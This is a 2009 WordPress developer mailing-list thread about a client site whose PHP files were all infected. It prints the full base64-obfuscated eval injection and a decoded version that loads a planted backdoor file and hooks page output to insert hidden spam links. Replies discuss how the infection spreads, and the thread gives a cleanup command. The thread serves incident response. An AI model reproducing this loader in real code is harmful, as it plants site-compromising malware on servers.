Weird PHP Injection

I'm not sure if anyone has seen this before... except for this guy:
http://wordpress.org/support/topic/320918?replies=8

But I just ran into an issue with a client using WP2.8.4. It seems like
every single file in WP (including themes and plugins) had this injected at
the top:

<?
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvdmFyL3d3dy9odG1sL3dwLWNvbnRlbnQvcGx1Z2lucy93cC1waHBteWFkbWluL3BocG15YWRtaW4vcG1kL3N0eWxlcy9kZWZhdWx0L2ltYWdlcy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL3Zhci93d3cvaHRtbC93cC1jb250ZW50L3BsdWdpbnMvd3AtcGhwbXlhZG1pbi9waHBteWFkbWluL3BtZC9zdHlsZXMvZGVmYXVsdC9pbWFnZXMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMz
 RGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM
 9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19tYXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVybiBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19'));
?>


Which I decoded and prettied up for everyone:

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])) {
    $GLOBALS['sh_no'] = 1;

if(file_exists('/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php'))
{

include_once('/var/www/html/wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php');

        if(function_exists('gml')&&!function_exists('dgobh')) {

            if(!function_exists('gzdecode')) {

                function gzdecode($R20FD65E9C7406034FADC682F06732868) {

                    $R6B6E98CDE8B33087A33E4D3A497BD86B =
ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));
                    $R60169CD1C47B7A7A85AB44F884635E41 = 10;
                    $R0D54236DA20594EC13FC81B209733931 = 0;

                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&4) {
                        $R0D54236DA20594EC13FC81B209733931 =
unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));
                        $R0D54236DA20594EC13FC81B209733931 =
$R0D54236DA20594EC13FC81B209733931[1];
                        $R60169CD1C47B7A7A85AB44F884635E41+ =
2+$R0D54236DA20594EC13FC81B209733931;
                    }

                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&8) {
                        $R60169CD1C47B7A7A85AB44F884635E41 =
strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                    }
                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&16) {
                        $R60169CD1C47B7A7A85AB44F884635E41 =
strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;
                    }
                    if($R6B6E98CDE8B33087A33E4D3A497BD86B&2) {
                        $R60169CD1C47B7A7A85AB44F884635E41+ = 2;
                    }
                        $RC4A5B5E310ED4C323E04D72AFAE39F53 =
gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));

                    if($RC4A5B5E310ED4C323E04D72AFAE39F53 =  =  = FALSE) {
                        $RC4A5B5E310ED4C323E04D72AFAE39F53 =
$R20FD65E9C7406034FADC682F06732868;
                    }

                    return $RC4A5B5E310ED4C323E04D72AFAE39F53;
                }
            }

            function dgobh($RDA3E61414E50AEE968132F03D265E0CF) {

                Header('Content-Encoding: none');
                $R3E33E017CD76B9B7E6C7364FB91E2E90 =
gzdecode($RDA3E61414E50AEE968132F03D265E0CF);


if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)) {
                    return
preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);
                } else {
                    return gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;
                }
            }

            ob_start('dgobh');
        }
    }
}

I have no idea what it does and I'm not sure if the WP-phpMyAdmin plugin had
a security hole or why it's part of this code. But I deactivated it on the
client's site.

To clean it up:
I first tried just upgrading him to WP2.8.5, but as soon as I visited the
site, it re-injected all the files with that crap. So I ran this script to
remove it from all files:

find . -name '*.php' | xargs perl -pi -e "s#\<\?
/\*\*/eval\(base64_decode\('.+'\)\); \?\>##g"

Then, for good measure I re-copied all the WP2.8.5 files back over. It seems
to have fixed it for the client.

Also, for what it's worth, these are all the plugins that he had
activated...

    AddThis Social Bookmarking Widget
    Advanced Excerpt
    Akismet
    Dagon Design Form Mailer
    Event Calendar
    Lightbox 2
    NextGEN Gallery
    Search & Replace
    SEO Title Tag
    Similarity
    SimplePie Core
    SimplePie Plugin for WordPress
    Theme Switcher
    Twitter Tools
    Viper's Video Quicktags
    WP-phpMyAdmin
    wp-Table
    WP-Table Reloaded
    WPtouch iPhone Theme

I'm still digging to see if I can figure out where the actual hole was. Any
ideas?

Lew Ayotte
Full Throttle Development, LLC
706.363.0688
478.246.4627
lew@...
http://fullthrottledevelopment.com
http://twitter.com/full_throttle
http://twitter.com/lewayotte
_______________________________________________
wp-hackers mailing list
wp-hackers@...
http://lists.automattic.com/mailman/listinfo/wp-hackers

On Thu, Oct 29, 2009 at 2:45 PM, Lew Ayotte - Full Throttle
Development <lew@...> wrote:
> I'm not sure if anyone has seen this before... except for this guy:
> http://wordpress.org/support/topic/320918?replies=8
>
> But I just ran into an issue with a client using WP2.8.4. It seems like
> every single file in WP (including themes and plugins) had this injected at
> the top:

In the cases where I've seen all files hit like this, then I've always
discovered two things.

1. The server is a shared host (many websites, same server).
2. The server itself is insecure (the web user can easily write to all
the web facing files).

The usual method of entry is for some site (any site) on that shared
server to get hacked. The attacker then runs a piece of code which
simply recursively searches all sites on that system and adds its
malicious code to them all that fit some pattern (like *.php, for
example).

Well setup shared servers don't have this problem. A server running
suPHP, for example, would prevent this sort of attack because the php
processes run under the user account, not the generic web account. So
when the attacker gains privileges, he's running as the generic user
who doesn't have the same kind of access that the "web" user does.

My advice: Switch hosts. A host that can't properly configure their
systems is not one worth sticking with.

-Otto
Sent from Memphis, TN, United States
_______________________________________________
wp-hackers mailing list
wp-hackers@...
http://lists.automattic.com/mailman/listinfo/wp-hackers

I've seen this a lot lately. It's actually not just limited to WordPress
since I've seen it in PHP-based forum software as well. While the code
may not be exactly the same, it is similar enough to tell me that it is
either the same family of code or a derivative.

In the forum case, an bug was exploited that allowed the attacker to
load PHP code through an uploaded image that didn't filter against PHP
files being uploaded. This initial PHP code goes through all the PHP
files it can find on the site and adds the code similar to what you have
below to them.

As seen in your partial decode, the code in each of the files calls the
origin code each time to ensure that all new or cleaned up PHP files are
remodified, thus making it hard to remove unless you find that origin
file and remove it first.

I've yet to determine exactly how WordPress sites pick this up, but I
wouldn't be surprised if it isn't through a similar process of being
able to upload a PHP file to the server through a bugged piece of code.
It is possible that a different method is used and that it is through
compromised FTP, SSH, etc credentials or through shared hosting with
poor security that doesn't prevent the spread of files between different
hosting accounts.

Every time I've seen code like this, it does nothing more than inject a
hidden link farm into the content of the site. So, it's destructive to
the search engine rankings of the exploited site, but I have yet to see
it attempt to be anything more dangerous than that.

Chris Jean
http://gaarai.com/
@chrisjean



Lew Ayotte - Full Throttle Development wrote:
> I'm not sure if anyone has seen this before... except for this guy:
> http://wordpress.org/support/topic/320918?replies=8
>
> But I just ran into an issue with a client using WP2.8.4. It seems like
> every single file in WP (including themes and plugins) had this injected at
> the top:
>
> <?
> /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvdmFyL3d3dy9odG1sL3dwLWNvbnRlbnQvcGx1Z2lucy93cC1waHBteWFkbWluL3BocG15YWRtaW4vcG1kL3N0eWxlcy9kZWZhdWx0L2ltYWdlcy9zdHlsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL3Zhci93d3cvaHRtbC93cC1jb250ZW50L3BsdWdpbnMvd3AtcGhwbXlhZG1pbi9waHBteWFkbWluL3BtZC9zdHlsZXMvZGVmYXVsdC9pbWFnZXMvc3R5bGUuY3NzLnBocCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3JkKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYw
 Mz
>  RGQURDNjgyRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGN
 TM
_______________________________________________
wp-hackers mailing list
wp-hackers@...
http://lists.automattic.com/mailman/listinfo/wp-hackers

Thanks Otto,

It's actually a rackspace managed server, not exactly shared hosting, only
semi-shared. In the sense that each site they own is a virtual server. So it
would only have access to the files on this particular virtualization.

I did another grep for "base64" which yielded some interesting results.
These three files in particular:
wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/dg.php
wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/s.php
wp-content/plugins/wp-phpmyadmin/phpmyadmin/pmd/styles/default/images/style.css.php

So there is a ton more encoded code in those files, but again, since this is
located in the phpMyAdmin plugin dir for WP, it makes me think that it is an
exploit in that particular plugin -- of course, it could just be a
coincidence.

Chris,

Yeah, the only reason we noticed was because the code actually screwed up
the formatting for wp-admin. Like it was missing a </div> or something.

Lew Ayotte
Full Throttle Development, LLC
706.363.0688
478.246.4627
lew@...
http://fullthrottledevelopment.com
http://twitter.com/full_throttle
http://twitter.com/lewayotte


On Thu, Oct 29, 2009 at 3:54 PM, Otto <otto@...> wrote:
_______________________________________________
wp-hackers mailing list
wp-hackers@...
http://lists.automattic.com/mailman/listinfo/wp-hackers